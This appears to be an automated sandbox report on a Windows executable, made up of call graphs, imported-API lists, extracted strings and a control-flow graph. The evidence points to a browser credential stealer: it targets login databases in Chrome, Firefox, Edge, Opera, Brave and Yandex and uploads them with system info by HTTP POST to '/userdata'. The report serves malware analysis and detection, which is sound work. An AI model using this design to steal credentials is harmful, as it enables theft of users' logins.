??1?$codecvt@_WDU_Mbstatet@@@std@@MEAA 3847 7ff71e398861 3846->3847 3848 7ff71e398854 3846->3848 3849 7ff71e39b500 _Receive_impl free 3848->3849 3849->3847 3850 7ff71e39c630 3851 7ff71e39c643 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3850->3851 3852 7ff71e39c658 3850->3852 3851->3852 3932 7ff71e3988b0 ?uncaught_exception@std@ 3933 7ff71e3988c3 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3932->3933 3934 7ff71e3988cd 3932->3934 3933->3934 3935 7ff71e3986b0 3936 7ff71e397530 13 API calls 3935->3936 3937 7ff71e398704 ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3936->3937 3938 7ff71e398720 3937->3938 3939 7ff71e398731 3937->3939 3940 7ff71e39b500 _Receive_impl free 3938->3940 3940->3939 3666 7ff71e397330 3668 7ff71e397356 3666->3668 3670 7ff71e39735d 3666->3670 3667 7ff71e39b4e0 Concurrency::cancel_current_task 8 API calls 3669 7ff71e3974d6 3667->3669 3668->3667 3670->3668 3671 7ff71e3973e3 fputc 3670->3671 3672 7ff71e397405 ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD 3670->3672 3671->3668 3673 7ff71e397474 3672->3673 3674 7ff71e39744a 3672->3674 3673->3668 3676 7ff71e397483 fwrite 3673->3676 3674->3673 3675 7ff71e39744f 3674->3675 3675->3668 3677 7ff71e397454 fputc 3675->3677 3676->3668 3677->3668 3745 7ff71e39cdae ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA 3208 7ff71e396bc0 3209 7ff71e396bf3 3208->3209 3216 7ff71e396c51 3209->3216 3217 7ff71e3988f0 3209->3217 3211 7ff71e396c16 3214 7ff71e396c24 _fseeki64 3211->3214 3215 7ff71e396c3b fgetpos 3211->3215 3211->3216 3214->3215 3214->3216 3215->3216 3229 7ff71e39b4e0 3216->3229 3218 7ff71e3989c3 3217->3218 3219 7ff71e398913 3217->3219 3220 7ff71e39b4e0 Concurrency::cancel_current_task 8 API calls 3218->3220 3219->3218 3221 7ff71e39891d 3219->3221 3222 7ff71e3989d2 3220->3222 3223 7ff71e398961 3221->3223 3224 7ff71e398936 ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD 3221->3224 3222->3211 3226 7ff71e39b4e0 Concurrency::cancel_current_task 8 API calls 3223->3226 3225 7ff71e39895c 3224->3225 3225->3223 3228 7ff71e398997 fwrite 3225->3228 3227 7ff71e39897e 3226->3227 3227->3211 3228->3223 3230 7ff71e39b4e9 3229->3230 3231 7ff71e396cbb 3230->3231 3232 7ff71e39bb34 IsProcessorFeaturePresent 3230->3232 3233 7ff71e39bb4c 3232->3233 3238 7ff71e39bc08 RtlCaptureContext 3233->3238 3239 7ff71e39bc22 RtlLookupFunctionEntry 3238->3239 3240 7ff71e39bb5f 3239->3240 3241 7ff71e39bc38 RtlVirtualUnwind 3239->3241 3242 7ff71e39bb00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3240->3242 3241->3239 3241->3240 3746 7ff71e3917c0 3747 7ff71e397c10 _Receive_impl 3 API calls 3746->3747 3748 7ff71e391802 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3747->3748 3857 7ff71e397240 3859 7ff71e39725b 3857->3859 3858 7ff71e397271 3859->3858 3860 7ff71e3972ab ungetc 3859->3860 3860->3858 3176 7ff71e399bd0 ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 3682 7ff71e398750 3683 7ff71e397c10 _Receive_impl 3 API calls 3682->3683 3685 7ff71e398764 3683->3685 3684 7ff71e398776 3685->3684 3686 7ff71e39b500 _Receive_impl free 3685->3686 3686->3684 3687 7ff71e39b950 3691 7ff71e39c150 SetUnhandledExceptionFilter 3687->3691 3756 7ff71e3911d0 __std_exception_destroy 3757 7ff71e391205 3756->3757 3758 7ff71e3911f8 3756->3758 3759 7ff71e39b500 _Receive_impl free 3758->3759 3759->3757 3949 7ff71e396cd0 3950 7ff71e396ce9 ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J 3949->3950 3951 7ff71e396cf8 3949->3951 3950->3951 3952 7ff71e396d79 3951->3952 3953 7ff71e396d59 3951->3953 3954 7ff71e396d2c memcpy 3951->3954 3953->3952 3955 7ff71e396d65 fwrite 3953->3955 3954->3952 3954->3953 3955->3952 3956 7ff71e3968d0 3957 7ff71e3968e1 3956->3957 3962 7ff71e39691e 3956->3962 3958 7ff71e396931 _invalid_parameter_noinfo_noreturn 3957->3958 3959 7ff71e396916 3957->3959 3966 7ff71e399fb0 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 3958->3966 3960 7ff71e39b500 _Receive_impl free 3959->3960 3960->3962 3964 7ff71e396965 3965 7ff71e396978 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 3967 7ff71e39a012 3966->3967 3968 7ff71e39a087 ??1_Lockit@std@@QEAA 3967->3968 3969 7ff71e39a029 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 3967->3969 3970 7ff71e39a035 3967->3970 3971 7ff71e39b4e0 Concurrency::cancel_current_task 8 API calls 3968->3971 3969->3970 3970->3968 3973 7ff71e39a04c ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 3970->3973 3972 7ff71e396955 ?always_noconv@codecvt_base@std@ 3971->3972 3972->3964 3972->3965 3974 7ff71e39a060 3973->3974 3975 7ff71e39a0b7 3973->3975 3980 7ff71e39b448 3974->3980 3983 7ff71e391470 3975->3983 3978 7ff71e39a0bc 3981 7ff71e39b508 std::_Facet_Register 3 API calls 3980->3981 3982 7ff71e39a072 3981->3982 3982->3968 3986 7ff71e391440 3983->3986 3985 7ff71e39147e _CxxThrowException __std_exception_copy 3985->3978 3986->3985
            APIs
              • Part of subcall function 00007FF71E391520: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E39157F
              • Part of subcall function 00007FF71E391520: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF71E39159E
              • Part of subcall function 00007FF71E391520: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E3915D2
              • Part of subcall function 00007FF71E391520: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF71E391609
              • Part of subcall function 00007FF71E391520: isalnum.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF71E391648
              • Part of subcall function 00007FF71E391520: ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140 ref: 00007FF71E39166D
              • Part of subcall function 00007FF71E391520: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF71E39169B
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E391C67
            • memcpy.VCRUNTIME140 ref: 00007FF71E391CAF
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E391DB1
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E391E02
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E391E53
            • WinHttpOpen.WINHTTP ref: 00007FF71E391E86
            • WinHttpConnect.WINHTTP ref: 00007FF71E391EC2
            • memcpy.VCRUNTIME140 ref: 00007FF71E39207E
            • memcpy.VCRUNTIME140 ref: 00007FF71E3921A4
            • GetFileAttributesW.KERNELBASE ref: 00007FF71E392254
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF71E3922A7
            • memcpy.VCRUNTIME140 ref: 00007FF71E3924FF
            • memcmp.VCRUNTIME140 ref: 00007FF71E392597
            • memcpy.VCRUNTIME140 ref: 00007FF71E3927C6
            • memcpy.VCRUNTIME140 ref: 00007FF71E392BF9
              • Part of subcall function 00007FF71E39A0C0: memcpy.VCRUNTIME140 ref: 00007FF71E39A0F8
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF71E39301F
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E39302A
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E393031
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E393038
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E39303F
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E393046
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E39304D
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E393054
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E39305B
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E393062
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E393069
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E393070
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E393077
            • WinHttpCloseHandle.WINHTTP ref: 00007FF71E393357
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E39339F
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF71E3933C6
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF71E3933D6
            • GetLastError.KERNEL32 ref: 00007FF71E3933A6
              • Part of subcall function 00007FF71E3999F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399AE6
            • WinHttpCloseHandle.WINHTTP ref: 00007FF71E3933E9
            • GetLastError.KERNEL32 ref: 00007FF71E3933F1
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF71E393411
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF71E393421
            • WinHttpCloseHandle.WINHTTP ref: 00007FF71E39342A
            • GetLastError.KERNEL32 ref: 00007FF71E393432
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E39307E
              • Part of subcall function 00007FF71E3999F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399A69
              • Part of subcall function 00007FF71E3999F0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399A89
              • Part of subcall function 00007FF71E3999F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399A99
              • Part of subcall function 00007FF71E3999F0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B7C
              • Part of subcall function 00007FF71E3999F0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B83
              • Part of subcall function 00007FF71E3999F0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B90
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E393085
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E39308C
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF71E3923CE
              • Part of subcall function 00007FF71E39B508: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF71E39B538
              • Part of subcall function 00007FF71E39B508: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF71E39B53E
            • WinHttpOpenRequest.WINHTTP ref: 00007FF71E391F1F
              • Part of subcall function 00007FF71E39B508: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF71E39107B), ref: 00007FF71E39B522
            • memcpy.VCRUNTIME140 ref: 00007FF71E3930E8
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E39313F
            • WinHttpSendRequest.WINHTTP ref: 00007FF71E39318B
            • WinHttpReceiveResponse.WINHTTP ref: 00007FF71E39319E
            • WinHttpQueryHeaders.WINHTTP ref: 00007FF71E3931D5
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF71E39324A
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF71E39325A
            • WinHttpCloseHandle.WINHTTP ref: 00007FF71E393263
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E3932A2
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E3932F0
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E393338
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF71E393452
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF71E393462
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E393494
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E3934DC
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF71E393519
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF71E39351F
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF71E393525
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF71E393537
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF71E39353D
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF71E393549
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$V01@$U?$char_traits@$D@std@@@std@@$??6?$basic_ostream@$Http$Concurrency::cancel_current_taskmemcpy$V01@@$CloseHandle$ErrorLastU?$char_traits@_W@std@@@std@@$?good@ios_base@std@@OpenRequest$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?setw@std@@?sputc@?$basic_streambuf@?uncaught_exception@std@@AttributesConnectD@std@@@1@_FileHeadersJ@1@_Osfx@?$basic_ostream@_QueryReceiveResponseSendSmanip@_U?$_V12@V21@@V?$basic_streambuf@Vios_base@1@isalnummallocmemcmp
            • String ID: $" }$", "ip": "$"; filename="login_data$--WebKitFormBoundary$.json"$.sqlite"$/userdata$?? ??????? ???????? ????? ?? ???????.$?? ??????? ????????? ??????. HTTP ?????? ???: $?????? ??????? ??????????. HTTP ?????? ???: $?????? ???????? ?????? WinHTTP: $?????? ???????? ???????: $?????? ???????? HTTP-???????: $?????? ?????????? ? ????????: $Content-Disposition: form-data; name="sysinfo"$Content-Type: application/json$Content-Type: application/x-sqlite3$Content-Type: multipart/form-data; boundary=WebKitFormBoundary$File is found: $File not found: $FileData is empty$POST$WinHTTP/1.0$brave$chrome$chromebeta$chromium$firefox$fo": "$msedge$name="$opera$operagx$yandex
            • API String ID: 3244378811-4092172495
            • Opcode ID: c9727f84dfdf7495cf255ca20332196da41f50b747834c9969a22f64d71bc7a5
            • Instruction ID: cc52be4f3d935da4164ab040f382dca4112a863c14103cd63f3359c097daa6c1
            • Opcode Fuzzy Hash: c9727f84dfdf7495cf255ca20332196da41f50b747834c9969a22f64d71bc7a5
            • Instruction Fuzzy Hash: 57E2A562E08F8685EB10AB25D4403FDA3A1EB45BB4F905639EA6D176D5DF3CF588C320

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 483 7ff71e395d80-7ff71e395e24 GetConsoleWindow ShowWindow call 7ff71e399610 call 7ff71e394a40 call 7ff71e3983c0 490 7ff71e395e26-7ff71e395e38 483->490 491 7ff71e395e5b-7ff71e395e92 call 7ff71e399610 call 7ff71e394640 call 7ff71e3983c0 483->491 492 7ff71e395e56 call 7ff71e39b500 490->492 493 7ff71e395e3a-7ff71e395e4d 490->493 502 7ff71e395e94-7ff71e395ea6 491->502 503 7ff71e395ec9-7ff71e395f00 call 7ff71e399610 call 7ff71e393560 call 7ff71e3983c0 491->503 492->491 493->492 495 7ff71e395e4f-7ff71e395e55 _invalid_parameter_noinfo_noreturn 493->495 495->492 504 7ff71e395ec4 call 7ff71e39b500 502->504 505 7ff71e395ea8-7ff71e395ebb 502->505 514 7ff71e395f02-7ff71e395f14 503->514 515 7ff71e395f37-7ff71e395fe7 call 7ff71e399610 GlobalMemoryStatusEx memset call 7ff71e396810 call 7ff71e3999f0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z call 7ff71e3999f0 503->515 504->503 505->504 507 7ff71e395ebd-7ff71e395ec3 _invalid_parameter_noinfo_noreturn 505->507 507->504 517 7ff71e395f32 call 7ff71e39b500 514->517 518 7ff71e395f16-7ff71e395f29 514->518 528 7ff71e395fe9-7ff71e395ff3 515->528 529 7ff71e39600a-7ff71e39600d 515->529 517->515 518->517 520 7ff71e395f2b-7ff71e395f31 _invalid_parameter_noinfo_noreturn 518->520 520->517 528->529 530 7ff71e395ff5-7ff71e396008 528->530 531 7ff71e39600f-7ff71e396019 529->531 532 7ff71e396031-7ff71e396035 529->532 533 7ff71e396039-7ff71e39603c 530->533 531->532 534 7ff71e39601b-7ff71e39602f 531->534 532->533 535 7ff71e396049-7ff71e3960a8 call 7ff71e397c10 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff71e3983c0 533->535 536 7ff71e39603e-7ff71e396048 call 7ff71e3996c0 533->536 534->533 543 7ff71e3960aa-7ff71e3960bc 535->543 544 7ff71e3960dc-7ff71e396113 call 7ff71e399610 call 7ff71e393780 call 7ff71e3983c0 535->544 536->535 545 7ff71e3960d7 call 7ff71e39b500 543->545 546 7ff71e3960be-7ff71e3960d1 543->546 560 7ff71e396115-7ff71e396127 544->560 561 7ff71e39614a-7ff71e396181 call 7ff71e399610 call 7ff71e393aa0 call 7ff71e3983c0 544->561 545->544 546->545 548 7ff71e39676e-7ff71e396774 _invalid_parameter_noinfo_noreturn 546->548 551 7ff71e396775 call 7ff71e39b500 548->551 556 7ff71e39677a-7ff71e396796 551->556 558 7ff71e396798-7ff71e3967a9 556->558 559 7ff71e3967cc-7ff71e3967fd call 7ff71e39b4e0 556->559 562 7ff71e3967c7 call 7ff71e39b500 558->562 563 7ff71e3967ab-7ff71e3967be 558->563 565 7ff71e396145 call 7ff71e39b500 560->565 566 7ff71e396129-7ff71e39613c 560->566 578 7ff71e396183-7ff71e396195 561->578 579 7ff71e3961b8-7ff71e3961da call 7ff71e394e50 561->579 562->559 563->562 567 7ff71e3967c0-7ff71e3967c6 _invalid_parameter_noinfo_noreturn 563->567 565->561 566->565 571 7ff71e39613e-7ff71e396144 _invalid_parameter_noinfo_noreturn 566->571 567->562 571->565 580 7ff71e3961b3 call 7ff71e39b500 578->580 581 7ff71e396197-7ff71e3961aa 578->581 586 7ff71e3961e0-7ff71e39620d 579->586 587 7ff71e3967fe-7ff71e396803 call 7ff71e391310 579->587 580->579 581->580 583 7ff71e3961ac-7ff71e3961b2 _invalid_parameter_noinfo_noreturn 581->583 583->580 588 7ff71e39620f-7ff71e396219 586->588 589 7ff71e396288-7ff71e396315 memcpy call 7ff71e399610 call 7ff71e3983c0 586->589 595 7ff71e396804-7ff71e396809 call 7ff71e391270 587->595 593 7ff71e39624b-7ff71e39625e 588->593 594 7ff71e39621b-7ff71e396228 588->594 612 7ff71e396317-7ff71e396329 589->612 613 7ff71e39634d-7ff71e396355 589->613 598 7ff71e396260-7ff71e396262 593->598 599 7ff71e396264-7ff71e39626b 593->599 597 7ff71e39622c-7ff71e396237 call 7ff71e39b508 594->597 614 7ff71e39637f-7ff71e396385 _invalid_parameter_noinfo_noreturn 597->614 615 7ff71e39623d-7ff71e396249 597->615 600 7ff71e396284 598->600 601 7ff71e39627c-7ff71e396281 call 7ff71e39b508 599->601 602 7ff71e39626d-7ff71e396274 599->602 600->589 601->600 602->595 606 7ff71e39627a 602->606 606->597 619 7ff71e396347-7ff71e39634c call 7ff71e39b500 612->619 620 7ff71e39632b-7ff71e39633e 612->620 616 7ff71e396357-7ff71e396368 613->616 617 7ff71e39638b-7ff71e3963c2 call 7ff71e399610 call 7ff71e393cd0 call 7ff71e3983c0 613->617 618 7ff71e396386 call 7ff71e39b500 614->618 615->600 616->618 622 7ff71e39636a-7ff71e39637d 616->622 632 7ff71e3963c4-7ff71e3963d6 617->632 633 7ff71e3963f9-7ff71e396430 call 7ff71e399610 call 7ff71e393f60 call 7ff71e3983c0 617->633 618->617 619->613 620->619 625 7ff71e396340-7ff71e396346 _invalid_parameter_noinfo_noreturn 620->625 622->614 622->618 625->619 634 7ff71e3963f4 call 7ff71e39b500 632->634 635 7ff71e3963d8-7ff71e3963eb 632->635 644 7ff71e396432-7ff71e396444 633->644 645 7ff71e396467-7ff71e396488 call 7ff71e394180 call 7ff71e3983c0 633->645 634->633 635->634 637 7ff71e3963ed-7ff71e3963f3 _invalid_parameter_noinfo_noreturn 635->637 637->634 647 7ff71e396462 call 7ff71e39b500 644->647 648 7ff71e396446-7ff71e396459 644->648 654 7ff71e3964bf-7ff71e396555 memset call 7ff71e396810 GetModuleFileNameA call 7ff71e3999f0 * 3 645->654 655 7ff71e39648a-7ff71e39649c 645->655 647->645 648->647 650 7ff71e39645b-7ff71e396461 _invalid_parameter_noinfo_noreturn 648->650 650->647 668 7ff71e396557-7ff71e396561 654->668 669 7ff71e396578-7ff71e39657b 654->669 656 7ff71e3964ba call 7ff71e39b500 655->656 657 7ff71e39649e-7ff71e3964b1 655->657 656->654 657->656 659 7ff71e3964b3-7ff71e3964b9 _invalid_parameter_noinfo_noreturn 657->659 659->656 668->669 670 7ff71e396563-7ff71e396576 668->670 671 7ff71e39659f-7ff71e3965a3 669->671 672 7ff71e39657d-7ff71e396587 669->672 673 7ff71e3965a7-7ff71e3965aa 670->673 671->673 672->671 674 7ff71e396589-7ff71e39659d 672->674 675 7ff71e3965b7-7ff71e39660f call 7ff71e397c10 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff71e3983c0 673->675 676 7ff71e3965ac-7ff71e3965b6 call 7ff71e3996c0 673->676 674->673 683 7ff71e396611-7ff71e396623 675->683 684 7ff71e396643-7ff71e39667a call 7ff71e399610 call 7ff71e394390 call 7ff71e3983c0 675->684 676->675 685 7ff71e396625-7ff71e396638 683->685 686 7ff71e39663e call 7ff71e39b500 683->686 700 7ff71e3966b1-7ff71e3966e5 call 7ff71e395510 call 7ff71e391b50 684->700 701 7ff71e39667c-7ff71e39668e 684->701 685->686 688 7ff71e39672c-7ff71e396732 _invalid_parameter_noinfo_noreturn 685->688 686->684 692 7ff71e396733-7ff71e39673b call 7ff71e39b500 688->692 698 7ff71e39673c-7ff71e396744 692->698 698->556 699 7ff71e396746-7ff71e396757 698->699 699->551 702 7ff71e396759-7ff71e39676c 699->702 710 7ff71e3966ea-7ff71e3966f2 700->710 704 7ff71e396690-7ff71e3966a3 701->704 705 7ff71e3966ac call 7ff71e39b500 701->705 702->548 702->551 704->705 708 7ff71e3966a5-7ff71e3966ab _invalid_parameter_noinfo_noreturn 704->708 705->700 708->705 710->698 711 7ff71e3966f4-7ff71e396715 call 7ff71e39a1c0 710->711 711->692 714 7ff71e396717-7ff71e39672a 711->714 714->688 714->692
            APIs
            • GetConsoleWindow.KERNELBASE ref: 00007FF71E395DC1
            • ShowWindow.USER32 ref: 00007FF71E395DCF
              • Part of subcall function 00007FF71E399610: memcpy.VCRUNTIME140(?,?,?,?,?,00007FF71E391CCF), ref: 00007FF71E399656
              • Part of subcall function 00007FF71E394A40: memset.VCRUNTIME140(?), ref: 00007FF71E394A96
              • Part of subcall function 00007FF71E394A40: memset.VCRUNTIME140(?), ref: 00007FF71E394AAA
              • Part of subcall function 00007FF71E394A40: memset.VCRUNTIME140(?), ref: 00007FF71E394ABE
              • Part of subcall function 00007FF71E394A40: memset.VCRUNTIME140(?), ref: 00007FF71E394AD2
              • Part of subcall function 00007FF71E394A40: memset.VCRUNTIME140(?), ref: 00007FF71E394AE3
              • Part of subcall function 00007FF71E394A40: RegOpenKeyExA.KERNELBASE(?), ref: 00007FF71E394B13
              • Part of subcall function 00007FF71E394A40: RegGetValueA.KERNELBASE ref: 00007FF71E394B4C
              • Part of subcall function 00007FF71E394A40: RegCloseKey.KERNELBASE ref: 00007FF71E394B89
              • Part of subcall function 00007FF71E394A40: RegOpenKeyExA.KERNELBASE ref: 00007FF71E394BB8
              • Part of subcall function 00007FF71E394A40: RegGetValueA.KERNELBASE ref: 00007FF71E394BF1
              • Part of subcall function 00007FF71E3983C0: memcpy.VCRUNTIME140 ref: 00007FF71E398417
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E395E4F
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E395EBD
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E395F2B
            • GlobalMemoryStatusEx.KERNELBASE ref: 00007FF71E395F5A
            • memset.VCRUNTIME140 ref: 00007FF71E395F6C
            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF71E395F9A
            • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E39607C
            • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E396089
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E39613E
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E3961AC
            • memcpy.VCRUNTIME140 ref: 00007FF71E3962B9
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E396340
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E39637F
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E3963ED
